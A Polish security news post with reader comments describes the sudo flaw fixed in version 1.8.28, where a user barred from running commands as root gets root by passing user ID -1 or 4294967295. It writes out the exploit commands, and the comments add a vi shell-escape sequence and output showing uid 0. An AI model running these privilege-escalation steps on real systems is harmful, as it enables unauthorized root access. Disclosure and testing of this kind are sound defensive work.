Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book
Podatność w sudo. W pewnych sytuacjach można dostać roota robiąc sudo -u#-1 lub sudo -u#4294967295
Szczegóły zostały opisane w tym miejscu. „Pewne sytuacje” dotyczą scenariusza gdy użytkownik może uruchamiać (przez sudo) polecenia z uprawnieniami innych użytkowników, ale z wyłączenie roota, np. w /etc/sudoers mamy wpis:
myhost bob = (ALL, !root) /usr/bin/vi
czyli bob może odpalać vi z uprawnieniami dowolnego użytkownika, ale nie roota. Jednak korzystając z podatności może być i rootem wpisując:
sudo -u#-1 bash
lub
sudo -u#4294967295
Problem załatano niedawno w wersji 1.8.28 sudo.
–ms
Sprawdzone pod Ubuntu 16.04 LTS, sudo w wersji 1.8.16 – nie działa żadna opcja
Ponownie sprawdzone na CentOS 7, sudo w wersji 1.8.23 – również brak reakcji.
U mnie na Ubuntu 18.04 LTS przed updatem sudo zadziałało jak złoto.
sudo -u#-1 /usr/bin/vi
potem:
:set shell=/bin/bash
:shell
i powłoka jako root
Red Hat Enterprise Linux Server release 7.6 (Maipo)
user1 ALL=(ALL,!root) NOPASSWD: /bin/vi
[user1@server ~]$ sudo -u#-1 vi
:!id -u
0
Press ENTER or type command to continue
Dziękuję dobranoc.
Starszy model, starsza dystrybucja lepsza; skąd my to znamy?
Że to co stare jest dużo lepsze?
Pozdr.